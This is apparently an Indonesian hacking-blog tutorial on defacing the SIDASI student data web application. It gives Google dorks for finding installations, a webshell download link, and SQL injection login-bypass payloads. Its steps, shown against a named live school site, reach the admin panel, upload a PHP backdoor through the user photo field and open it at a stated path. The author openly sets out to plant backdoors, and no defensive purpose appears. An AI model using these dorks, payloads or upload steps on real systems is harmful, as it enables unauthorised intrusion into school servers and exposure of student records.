Deface Sistem Data Siswa (SIDASI) - Unauthenticated Bypass


Hai sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-


Kemarin saya iseng iseng mencari celah diwebapp yang bernama aplikasi rapor digital selang beberapa jam, saya tidak menemukan celah yang begitu berdampak atau celah yang sangat fatal. Saya pun mencoba berniat menyecan subdomain dari domain utama website tersebut, alhasil saya mencoba 3 sampai 4 subdomain. Namun tidak ada yang berdampak sangat fatal. saya berniat untuk menanamkan backdoor dan melihat isi dari webapp tersebut untuk lebih leluasa melihat source code yang ada dari webapp tersebut. 


Ntah bagaimana, saya menemukan satu subdomain dengan WebApp bernama Sidasi (Sistem Data Siswa), dengan celah yaitu bypass admin, oh tentu itu sangat fatal :D jika sudah dapat masuk kecontrol panel.


Langsung saja yah. 

Penjelasan mengenai WebApp SIDASI 

http://repository.amikom.ac.id/files/Publikasi_11.22.1328.pdf


"Bang upload shell nya gimana bang?"

"Bang bisa upload shell ga bang?"

"Bang bisa tebas index ga bang?"


Let's try.

Bahan :

Google dork : 

site:sidasi.* inurl:sch.id

site:sidasi.* inurl:.id

Webshell : 

https://anonfiles.com/tc78D4M8o0/My_Project_zip

Payload : 

Username : '=' 'or'

Password  : '=' 'or'

Username : ' or 1=1 limit 1 -- -+

Password  : ' or 1=1 limit 1 -- -+

Admin login       : /?page=admin


1. Dorking

dorking menggunakan dork diatas. Disini anggap saja saya sudah mempunya live target yah. Live target http://sidasi.madrasahku.site/


Tampilan


2. Exploit

Karena disini saya sudah mempunya live target, jadi selanjutnya kita akan masukan exploit menuju admin loginnya yah.

http://sidasi.madrasahku.site/?page=admin


Tampilan


3. Eksekusi

Tahap 1,dan 2 sudah selesai. Selanjutnya kita lanjut ketahap eksekusi untuk menanamkan shell backdoor :D. Isi username dan password dengan payload diatas.

Username : '=' 'or'

Password  : '=' 'or'

Username : ' or 1=1 limit 1 -- -+

Password  : ' or 1=1 limit 1 -- -+


Tampilan

Klik LOGIN dan kalian akan diarahkan ke halaman control panel (dashboard admin) atau apalah itu.


tampilan

Lalu kita klik Setting User 


Tampilan


Klik Tambah dan isi semua column yang ada. Bagian Foto user kalian upload dengan shell backdoor kalian.


Tampilan

Jika semua sudah diisi. Dan bagian Foto user telah terisi dengan shell backdoor kalian, dan klik Simpan dan shell backdoor pun akan terupload kedalam server.


Untuk cara aksesnya begini.

https://localhost/assets/gambar/user/Your_shell_name.php

Contoh

http://sidasi.madrasahku.site/assets/gambar/user/b0y.php


Tampilan

Nah,mungkin segini aja untuk artikel kali ini. Bila ada yang kurang atau salah kata biarkan saja.


Thanks

See u